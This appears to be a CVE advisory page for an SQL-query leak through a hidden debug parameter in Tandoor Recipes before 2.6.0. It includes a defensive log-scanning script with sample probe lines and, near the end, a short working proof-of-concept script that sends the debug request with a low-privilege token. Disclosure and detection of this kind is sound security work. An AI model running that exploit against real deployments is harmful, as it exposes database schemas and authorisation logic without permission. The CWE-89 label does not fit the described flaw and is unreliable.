Security Vulnerability Report
CVE-2026-33153 CVSS 6.5 MEDIUM

CVE-2026-33153

Published: 2026-03-26 19:17:03
Last Modified: 2026-03-30 19:16:17

Description

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. In versions prior to 2.6.0, the Recipe API endpoint exposes a hidden `?debug=true` query parameter that returns the complete raw SQL query being executed, including all table names, column names, JOIN relationships, WHERE conditions (revealing access control logic), and multi-tenant space IDs. This parameter works even when Django's `DEBUG=False` (production mode) and is accessible to any authenticated user regardless of their privilege level. This allows a low-privilege attacker to map the entire database schema and reverse-engineer the authorization model. Version 2.6.0 patches the issue.
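
Detection from the defender's side, added here and not part of the advisory or the Tandoor project: it scans constructed Combined Log Format access-log lines for Recipe API requests carrying the `debug=true` parameter the description names, so a pre-2.6.0 deployment can spot probing in its front-end logs. The `/api/recipe/` path prefix and the log format are assumptions about the deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs
from collections import Counter

# Combined Log Format as written by an nginx or Apache front-end (assumed).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines, not real traffic: one benign Recipe API
# request, two probes carrying the debug flag, and one probe against an
# endpoint the advisory does not name.
SAMPLE_LOG = """\
10.0.0.7 - alice [26/Mar/2026:19:20:01 +0000] "GET /api/recipe/?page=1 HTTP/1.1" 200 5120
10.0.0.9 - bob [26/Mar/2026:19:20:05 +0000] "GET /api/recipe/?debug=true HTTP/1.1" 200 48211
10.0.0.9 - bob [26/Mar/2026:19:20:06 +0000] "GET /api/recipe/42/?DEBUG=True&page=2 HTTP/1.1" 200 39044
10.0.0.9 - bob [26/Mar/2026:19:20:09 +0000] "GET /api/food/?debug=true HTTP/1.1" 200 900
"""

def is_debug_probe(target: str) -> bool:
    """True if the request targets the Recipe API with debug=true.
    The advisory documents the lowercase form; key and value are matched
    case-insensitively so variant probes are still reported as attempts.
    """
    parts = urlsplit(target)
    if not parts.path.startswith("/api/recipe/"):   # assumed API prefix
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    return any(k.lower() == "debug" and any(v.lower() == "true" for v in vs)
               for k, vs in query.items())

def find_debug_probes(log_text: str) -> list[dict]:
    """One record per matching request: client, user, target, status."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_debug_probe(m["target"]):
            hits.append({"client": m["client"], "user": m["user"],
                         "target": m["target"], "status": int(m["status"])})
    return hits

def probes_per_client(log_text: str) -> Counter:
    """Count probes by source address to spot a scanner walking the API."""
    return Counter(h["client"] for h in find_debug_probes(log_text))

if __name__ == "__main__":
    for h in find_debug_probes(SAMPLE_LOG):
        print(f"[!] {h['client']} ({h['user']}) {h['target']} -> {h['status']}")
```

A 200 response with an unusually large body on such a request is the strongest sign the leak actually fired; a 4xx from a patched 2.6.0 instance still records the attempt.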

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Weakness: CWE-89
Secondary CVSS 4.0 metric: 7.7 HIGH, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. Note that this secondary vector rates privileges required as None, whereas the primary 3.1 vector (PR:L) and the description both assume an authenticated low-privilege user.

Configurations (Affected Products)

cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:* - VULNERABLE
Tandoor Recipes < 2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable Recipe API
# Example: http://target.com/api/recipe/
target_url = "http://target.com/api/recipe/"

# Headers with a valid low-privilege authentication token
# Replace 'YOUR_LOW_PRIV_TOKEN' with an actual session cookie or token
headers = {
    "Authorization": "Bearer YOUR_LOW_PRIV_TOKEN",
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-33153-Scanner)",
}

# The hidden debug parameter that triggers the SQL leak
params = {"debug": "true"}

try:
    print(f"[+] Sending request to {target_url} with debug parameter...")
    # A timeout keeps the script from hanging on an unresponsive host
    response = requests.get(target_url, headers=headers, params=params, timeout=15)

    if response.status_code == 200:
        print("[+] Request successful! Checking response for SQL queries...")
        # In a real scenario, the response JSON might contain a 'debug' or 'sql' key,
        # or the SQL might be appended to the output.
        print("[+] Response Content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/TandoorRecipes/recipes/releases/tag/2.6.0 (Release Notes)
https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-f83r-v3h5-pchf (Exploit, Vendor Advisory)
